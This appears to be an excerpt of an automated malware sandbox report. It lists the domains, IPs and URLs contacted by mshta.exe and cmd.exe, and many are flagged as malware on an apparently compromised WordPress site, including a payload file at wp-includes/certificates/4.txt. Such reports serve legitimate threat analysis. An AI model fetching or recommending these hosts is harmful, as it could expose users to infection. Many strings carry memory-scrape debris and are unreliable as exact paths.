http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.40ET4.0E)0=100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.d100%Avira URL Cloudmalware
https://facextrade.com.br/feed/100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3er=1.0.100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.200.NET4.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20author100%Avira URL Cloudmalware
http://facextrade.com.br/xmlrpc.php100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.04.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3C:100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/wlwmanifest.xml100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/4.txt...3100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.css100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/privacy-policyng4100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png$100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.css100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/4.txtmshta100%Avira URL Cloudmalware
https://facextrade.com.br/P/1.1100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.01.0)h100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0=1.06_pai100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0.NET4.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/4.txtsmshta100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0S100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4C:100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/4.txt#D100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4?ver=2.1.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2P100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/style.cssBn100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.00E)Hl100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.css?ver=1.0.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.cssstr100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3.0ks100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/4.txtcy100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
facextrade.com.br
187.45.240.69
truetrueunknown
gstaticadssl.l.google.com
172.217.16.195
truefalse
    		high
    netdna.bootstrapcdn.com
    		104.18.11.207
    		truefalse
      		high
      www3.l.google.com
      		142.250.181.238
      		truefalse
        		high
        storage.ie6countdown.com
        		unknown
        		unknownfalse
          		unknown
          translate.google.com
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0true
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.pngtrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0true
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3true
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.8true
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1true
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3true
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1true
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.csstrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngtrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.csstrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20true
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3true
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.css?ver=1.0.0true
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2true
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://facextrade.com.br/wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.60C;mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://facextrade.com.br/feed/atom/Ymshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/img/next.pnghttp://facextramshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0ET4.0E)remshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4ET4.0E)mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://adomas.org/javascript-mouse-wheel/jquery.mousewheel.min[1].js.8.drfalse
            • URL Reputation: safe
            		unknown
            http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.21.2.1mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/themes/theme51253/main-style.css.css?ver=4.9.204.9.201.2.8.1241mshta.exe, 00000008.00000002.1167349641.0000000000292000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-201204179mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://facextrade.com.br/wp-content/themes/theme51253/favicon.icomshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://vimeo.com/groups/:group/videos/:idmshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drfalse
              		high
              https://translate.google.com/ymshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://facextrade.com.br/aemshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0http://facextrade.commshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://facextrade.com.br/xmlrpc.phpamshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://csp.withgoogle.com/csp/report-to/apps-themesmshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://netdna.bootstrapcdn.com/mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://youtu.be/:idmshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drfalse
                    		high
                    http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.019mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://creativecommons.org/licenses/by/3.0/mshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drfalse
                      		high
                      http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1lamshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6imshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0Pmshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg.0=1.0mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0C:mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.opensource.org/licenses/mit-license.phpmshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, camera.min[1].js.8.dr, swfobject[1].js.8.dr, jplayer.playlist.min[1].js.8.drfalse
                        		high
                        http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6ver=2.3.0mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3-USmshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://twitter.com/fontawesome.mshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drfalse
                          		high
                          http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2iimshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.30E)ferrmshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3ET4.0C;mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://facextrade.com.br/wp-includes/certificates/privacy-policyflateCmshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://developers.google.com/maps/documentation/javascript/styling#cloud_toolingmshta.exe, 00000008.00000003.937380901.00000000003B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.30E)nsla#mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://github.com/joeldbirch/onHoverIntentmshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036205604.0000000004825000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174196123.000000000482C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036412519.0000000004828000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036484778.0000000004829000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036357765.0000000004827000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036567110.000000000482B000.00000004.00000800.00020000.00000000.sdmp, superfish[1].js.8.drfalse
                              		high
                              http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0ET4.0E)mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-content/themes/CherryFramework/style.css.9.20ive.css.NET4.0E)mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0.NET4.0E)&mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://kyruus.commshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0.NET4.0E)Jmshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.40ET4.0E)0=mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.dmshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172304935.0000000003A2E000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://facextrade.com.br/feed/mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3er=1.0.mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.200.NET4.0E)mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20authormshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/xmlrpc.phpmshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.04.0E)mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3C:mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20)mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-includes/wlwmanifest.xmlmshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://facextrade.com.br/wp-includes/certificates/4.txt...3mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://app.vzaar.com/videos/:idmshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drfalse
                                		high
                                http://facextrade.com.br/wp-includes/certificates/privacy-policyng4mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://info.template-help.com/help/style[1].css.8.drfalse
                                  		high
                                  http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.jsmshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0)mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png$mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://netdna.bootstrapcdn.com/font-awesome/3.2.1/font/fontawesome-webfont.eot?v=3.2.1.NET4.0E)mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://facextrade.com.br/wp-includes/certificates/4.txtmshtamshta.exe, 00000008.00000002.1166866976.0000000000200000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://facextrade.com.br/P/1.1mshta.exe, 00000008.00000002.1172304935.0000000003A2E000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.01.0)hmshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0=1.06_paimshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://crl.entrust.net/2048ca.crl0mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0.NET4.0E)mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.gnu.org/copyleft/gpl.htmljplayer.playlist.min[1].js.8.drfalse
                                        		high
                                        http://facextrade.com.br/wp-includes/certificates/4.txtsmshtacmd.exe, 00000002.00000002.1166906475.000000000044E000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0Smshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4C:mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://facextrade.com.br/wp-includes/certificates/4.txt#Dmshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://github.com/mambows/mobilemenujquery.mobilemenu[1].js.8.drfalse
                                          		high
                                          http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4?ver=2.1.0mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2Pmshta.exe, 00000008.00000003.1061193305.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1169795103.0000000002FF3000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://facextrade.com.br/wp-content/themes/theme51253/style.cssBnmshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://vimeo.com/channels/:channel/:idmshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drfalse
                                            		high
                                            http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?vermshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.00E)Hlmshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.cssstrmshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3.0ksmshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://facextrade.com.br/wp-includes/certificates/4.txtcymshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown